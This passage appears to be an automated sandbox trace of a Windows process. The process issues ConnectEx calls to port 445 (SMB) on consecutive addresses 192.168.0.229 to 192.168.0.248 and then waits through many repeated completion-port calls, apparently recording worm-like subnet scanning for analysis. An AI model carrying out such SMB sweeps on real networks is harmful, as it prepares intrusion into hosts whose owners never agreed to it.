sin_addr="192.168.0.229"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea290 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.267] WSAGetLastError () returned 997 [0137.267] htons (hostshort=0x1bd) returned 0xbd01 [0137.267] ConnectEx (in: s=0x660, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.230"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea2c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.267] WSAGetLastError () returned 997 [0137.267] htons (hostshort=0x1bd) returned 0xbd01 [0137.267] ConnectEx (in: s=0x664, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.231"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea2f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.267] WSAGetLastError () returned 997 [0137.267] htons (hostshort=0x1bd) returned 0xbd01 [0137.267] ConnectEx (in: s=0x668, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.232"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea320 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.268] WSAGetLastError () returned 997 [0137.268] htons (hostshort=0x1bd) returned 0xbd01 [0137.268] ConnectEx (in: s=0x66c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.233"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea350 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.268] WSAGetLastError () returned 997 [0137.268] htons (hostshort=0x1bd) returned 0xbd01 [0137.268] ConnectEx (in: s=0x670, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.234"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea380 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.268] WSAGetLastError () returned 997 [0137.268] htons (hostshort=0x1bd) returned 0xbd01 [0137.268] ConnectEx (in: s=0x674, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.235"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea3b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.269] WSAGetLastError () returned 997 [0137.269] htons (hostshort=0x1bd) returned 0xbd01 [0137.269] ConnectEx (in: s=0x678, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.236"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea3e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.269] WSAGetLastError () returned 997 [0137.269] htons (hostshort=0x1bd) returned 0xbd01 [0137.269] ConnectEx (in: s=0x67c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.237"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea410 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.269] WSAGetLastError () returned 997 [0137.269] htons (hostshort=0x1bd) returned 0xbd01 [0137.269] ConnectEx (in: s=0x680, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.238"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea440 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.270] WSAGetLastError () returned 997 [0137.270] htons (hostshort=0x1bd) returned 0xbd01 [0137.270] ConnectEx (in: s=0x684, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.239"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea470 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.270] WSAGetLastError () returned 997 [0137.270] htons (hostshort=0x1bd) returned 0xbd01 [0137.270] ConnectEx (in: s=0x688, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.240"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea4a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.270] WSAGetLastError () returned 997 [0137.270] htons (hostshort=0x1bd) returned 0xbd01 [0137.270] ConnectEx (in: s=0x68c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.241"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea4d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.270] WSAGetLastError () returned 997 [0137.271] htons (hostshort=0x1bd) returned 0xbd01 [0137.271] ConnectEx (in: s=0x690, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.242"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea500 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.271] WSAGetLastError () returned 997 [0137.271] htons (hostshort=0x1bd) returned 0xbd01 [0137.271] ConnectEx (in: s=0x694, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.243"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea530 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.271] WSAGetLastError () returned 997 [0137.271] htons (hostshort=0x1bd) returned 0xbd01 [0137.271] ConnectEx (in: s=0x698, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.244"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea560 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.271] WSAGetLastError () returned 997 [0137.271] htons (hostshort=0x1bd) returned 0xbd01 [0137.271] ConnectEx (in: s=0x69c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.245"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea590 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.272] WSAGetLastError () returned 997 [0137.272] htons (hostshort=0x1bd) returned 0xbd01 [0137.272] ConnectEx (in: s=0x6a0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.246"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea5c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.272] WSAGetLastError () returned 997 [0137.272] htons (hostshort=0x1bd) returned 0xbd01 [0137.272] ConnectEx (in: s=0x6a4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.247"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea5f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.272] WSAGetLastError () returned 997 [0137.272] htons (hostshort=0x1bd) returned 0xbd01 [0137.272] ConnectEx (in: s=0x6a8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.248"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea620 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.273] WSAGetLastError () returned 997 [0137.273] htons (hostshort=0x1bd) returned 0xbd01 [0137.288] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0137.288] CreateTimerQueueTimer (in: phNewTimer=0x73dff70, TimerQueue=0xebed28, Callback=0x280fcd0, Parameter=0x0, DueTime=0x7530, Period=0x0, Flags=0x0 | out: phNewTimer=0x73dff70*=0xecfc60) returned 1 [0137.288] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 1 [0137.289] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0137.289] setsockopt (s=0x2cc, level=65535, optname=28688, optval=0x0, optlen=0) returned 0 [0137.289] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0137.290] getsockopt (in: s=0x2cc, level=65535, optname=28684, optval=0x73dff7c, optlen=0x73dff78 | out: optval="", optlen=0x73dff78) returned 0 [0137.290] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.201] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.202] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.203] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.204] 